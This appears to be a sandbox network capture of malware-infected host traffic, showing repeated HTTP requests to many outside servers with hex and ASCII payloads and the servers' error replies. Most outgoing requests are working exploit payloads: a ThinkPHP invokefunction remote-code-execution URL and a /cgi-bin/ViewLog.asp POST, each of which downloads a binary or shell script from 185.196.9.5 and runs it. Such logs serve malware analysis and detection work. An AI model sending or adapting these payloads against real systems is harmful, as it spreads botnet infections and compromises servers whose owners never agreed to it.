Feb 25, 2024 19:04:54.309637070 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:54.584952116 CET	313	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
997	192.168.2.15	50602	95.100.148.67	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:54.366529942 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:54.562154055 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:54 GMT Date: Sun, 25 Feb 2024 18:04:54 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 61 35 37 31 64 34 26 23 34 36 3b 31 37 30 38 38 38 34 32 39 34 26 23 34 36 3b 32 31 33 62 62 63 31 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.95a571d4.1708884294.213bbc11</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
998	192.168.2.15	37286	112.213.117.81	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:54.509237051 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:54.834857941 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:21 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
999	192.168.2.15	49034	112.163.211.83	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:54.799802065 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:55.088177919 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Sun, 25 Feb 2024 18:04:54 GMT Server: lighttpd/1.4.33 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1000	192.168.2.15	54354	112.125.88.61	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:54.818563938 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:55.125482082 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.25.3 Date: Sun, 25 Feb 2024 18:04:54 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1001	192.168.2.15	46210	112.74.140.27	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:54.833092928 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:55.154426098 CET	318	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:54 GMT Content-Type: text/html Content-Length: 166 Connection: close Via: HTTP/1.1 SLB.12 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1002	192.168.2.15	33632	112.74.80.156	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:54.839095116 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:55.171580076 CET	138	IN	HTTP/1.1 505 HTTP Version Not Supported Server: Apache-Coyote/1.1 Date: Sun, 25 Feb 2024 18:04:54 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
1003	192.168.2.15	40426	94.120.253.68	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:54.880914927 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1004	192.168.2.15	45326	31.200.72.67	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:54.881918907 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1005	192.168.2.15	55282	88.157.66.98	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:54.990622044 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:55.203399897 CET	170	IN	HTTP/1.0 400 Bad Request Server: AR Date: sun, 25 feb 2024 09:34:16 GMT Pragma: no-cache Cache-Control: no-store Content-Length: 11 Connection: Close Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
1006	192.168.2.15	55590	95.164.242.65	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.242633104 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:58.343556881 CET	1260	IN	HTTP/1.1 400 Bad Request Server: squid/3.5.27 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 18:04:58 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3556 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from ubuntu X-Cache-Lookup: NONE from ubuntu:8080 Via: 1.1 ubuntu (squid/3.5.27) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port
1007	192.168.2.15	49222	31.136.175.226	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.326035023 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:58.917009115 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:00.069156885 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:02.436963081 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:07.044958115 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:16.261009932 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:35.716583014 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1008	192.168.2.15	45712	62.29.63.53	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.363667011 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1009	192.168.2.15	55770	94.120.3.102	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.369906902 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1010	192.168.2.15	53394	31.200.87.15	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.373251915 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1011	192.168.2.15	39664	95.101.5.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:58.395447969 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
